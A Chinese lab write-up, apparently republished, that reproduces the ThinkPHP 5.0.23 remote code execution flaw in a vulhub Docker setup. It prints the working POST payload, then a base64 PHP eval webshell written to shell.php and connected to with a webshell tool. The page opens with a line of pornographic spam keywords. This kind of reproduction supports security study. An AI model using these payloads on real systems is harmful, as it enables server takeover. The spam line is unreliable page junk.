国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

這篇具有很好參考價(jià)值的文章主要介紹了ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄

漏洞介紹

漏洞復(fù)現(xiàn)

1.環(huán)境搭建

2.漏洞利用

漏洞介紹

5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。

漏洞復(fù)現(xiàn)

1.環(huán)境搭建

使用docker容器搭建漏洞環(huán)境,進(jìn)入漏洞文件所在。

cd vulhub/thinkphp/5.0.23-rce

(每個(gè)人安裝路徑不同,我這里是安裝在vulhub文件內(nèi),選擇自己的安裝路徑)

啟動(dòng)環(huán)境

docker-compose up -d

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

?等待漏洞環(huán)境啟動(dòng)完成后,訪問your-id:8080就可以看到thinkphp的默認(rèn)頁面了

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

2.漏洞利用

Poc 路徑:/index.php?s=captcha

訪問your-id:8080/index.php?s=captcha頁面會(huì)出現(xiàn)報(bào)錯(cuò)。

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

接下來我們進(jìn)行POST傳參,這里使用的工具是hackbar

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

命令被執(zhí)行

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

?接下來我們就可以上傳shell文件了,但是無法直接上傳shell文件,我們需要對shell文件進(jìn)行Base 64編碼

YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

發(fā)送POST請求

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

訪問shell.php文件上傳成功

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)?使用WebShell管理工具連接,輸入上傳的木馬所在位置、密碼以及選擇Base64編碼

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

查看網(wǎng)站目錄,復(fù)現(xiàn)完成。

ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)文章來源地址http://www.zghlxwxcb.cn/news/detail-458567.html

到了這里,關(guān)于ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • ThinkPHP5.0.21遠(yuǎn)程命令執(zhí)行漏洞

    ThinkPHP5.0.21遠(yuǎn)程命令執(zhí)行漏洞

    漏洞出現(xiàn)的背景 : ThinkPHP是?款運(yùn)?極?的PHP開發(fā)框架。 其5.0.23以前的版本中,獲取method的?法中沒有正確處理?法名, 導(dǎo)致攻擊者可以調(diào)?Request類任意?法并構(gòu)造利?鏈,從?導(dǎo)致遠(yuǎn)程代碼執(zhí)?漏洞。 由于ThinkPHP5框架對控制器名沒有進(jìn)??夠的安全檢測,導(dǎo)致在沒有開

    2024年02月04日
    瀏覽(23)
  • ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    前言 本節(jié)我將分析thinkphp5.0.x 版本的RCE漏洞,根據(jù)漏洞的研究模擬挖掘此漏洞的思路 本次分析框架下載,由于官方已經(jīng)下架了相關(guān)的下載接口,這里我們用三方下載 一份v5.0.22版本的 升級中... https://www.codejie.net/5828.html 附贈(zèng)?thinkphp5.0官方開發(fā)手冊 架構(gòu)總覽 · ThinkPHP5.0完全開

    2024年01月18日
    瀏覽(30)
  • Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    我們可以把namespace理解為一個(gè)單獨(dú)的空間,事實(shí)上它也就是一個(gè)空間而已,子命名空間那就是空間里再劃分幾個(gè)小空間,舉個(gè)例子: 當(dāng)有多個(gè)子命名空間有相同名稱類時(shí),不指定使用哪個(gè)命名空間的情況下取最后定義的命名空間中的類,比如上面的 dog 取的時(shí) dogC 中的類,在

    2024年04月22日
    瀏覽(25)
  • ThinkPHP5.0.0~5.0.23路由控制不嚴(yán)謹(jǐn)導(dǎo)致的RCE

    ThinkPHP5.0.0~5.0.23路由控制不嚴(yán)謹(jǐn)導(dǎo)致的RCE

    本次我們繼續(xù)以漏洞挖掘者的視角,來分析thinkphp的RCE 敏感函數(shù)發(fā)現(xiàn) 在調(diào)用入口函數(shù):/ThinkPHP_full_v5.0.22/public/index.php 時(shí) 發(fā)現(xiàn)了框架底層調(diào)用了thinkphplibrarythinkApp.php的app類中的incokeMethod方法 ?注意傳遞的參數(shù),ReflectionMethod接受的參數(shù)。如果是數(shù)組的形式, 那么參數(shù)1是這個(gè)

    2024年01月23日
    瀏覽(17)
  • thinkphp5.0.24反序列化漏洞分析

    thinkphp5.0.24反序列化漏洞分析

    thinkphp5框架: thinkphp5的入口文件在 publicindex.php ,訪問 反序列化起點(diǎn) 寫一個(gè)反序列化入口點(diǎn) 全局搜索 __destruct() 函數(shù) thinkphp_5.0.24thinkphplibrarythinkprocesspipesWindows.php 中的 __destruct() 函數(shù),調(diào)用了removeFiles() 跟進(jìn)removeFiles(),第163行的file_exists可以觸發(fā) __toString 方法 全局搜索

    2023年04月08日
    瀏覽(31)
  • Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

    Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

    Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability對應(yīng)的cve編號為CVE-2022-30190,其能夠在非管理員權(quán)限、禁用宏且在windows defender開啟的情況下繞過防護(hù),達(dá)到上線的效果。 當(dāng)從Word等應(yīng)用程序使用 URL 協(xié)議調(diào)用 MSDT 時(shí)存在遠(yuǎn)程執(zhí)行代碼漏洞,攻擊者通過制作惡意的

    2024年02月08日
    瀏覽(43)
  • uniapp小程序訂閱消息推送+Thinkphp5后端代碼教程示例

    uniapp小程序訂閱消息推送+Thinkphp5后端代碼教程示例

    記錄一下通過uniapp開發(fā)小程序消息推送的實(shí)例,配合后端tp推送,之前寫的項(xiàng)目是微信小程序而且后端是原生php,這次通過項(xiàng)目記錄一下 首先我們通過原生php代碼回顧一下,不考慮模板參數(shù)的話,主要就是“ touser ”和“ ACCESS_TOKEN ” 上述代碼大概就是基本流程,我們再看一

    2024年02月08日
    瀏覽(22)
  • 微軟遠(yuǎn)程桌面服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞

    微軟遠(yuǎn)程桌面服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞

    人和管理成為主要入侵突破口 安全需要人、技術(shù)、管理的全方位保障,然而人與管理由于其復(fù)雜性,常常成為入侵突破口。在 19 年處理的安全事件中,弱口令事件占比 22%,釣魚郵件相關(guān)事件占比 7%,配置不當(dāng)事件占比 3%, 與人和管理相關(guān)的事件合計(jì)占總數(shù)的 1/3,安全管理

    2024年02月13日
    瀏覽(26)
  • 遠(yuǎn)程代碼執(zhí)行漏洞的利用與防御

    遠(yuǎn)程代碼執(zhí)行漏洞的利用與防御

    全稱:remote command/code execute 分為遠(yuǎn)程命令執(zhí)行和遠(yuǎn)程代碼執(zhí)行 1.命令執(zhí)行漏洞: 直接調(diào)用操作系統(tǒng)命令 2.代碼執(zhí)行漏洞: 靠執(zhí)行腳本代碼調(diào)用操作系統(tǒng)命令 一般出現(xiàn)這種漏洞,是因?yàn)閼?yīng)用系統(tǒng)從設(shè)計(jì)上需要給用戶提供指定的遠(yuǎn)程命令操作的接口,比如我們常見的路由器、防

    2024年02月15日
    瀏覽(29)
  • RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    Remote Command/Code Execute 遠(yuǎn)程命令執(zhí)行/遠(yuǎn)程代碼執(zhí)行漏洞 這種漏洞通常出現(xiàn)在應(yīng)用程序或操作系統(tǒng)中,攻擊者可以通過利用漏洞注入惡意代碼,并在受攻擊的系統(tǒng)上執(zhí)行任意命令。 PHP 代碼執(zhí)行 PHP 代碼注入 OS 命令執(zhí)行 OS 命令注入 Java、Python…… Web 應(yīng)用程序 遠(yuǎn)程服務(wù) 操作系統(tǒng)

    2024年02月08日
    瀏覽(30)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包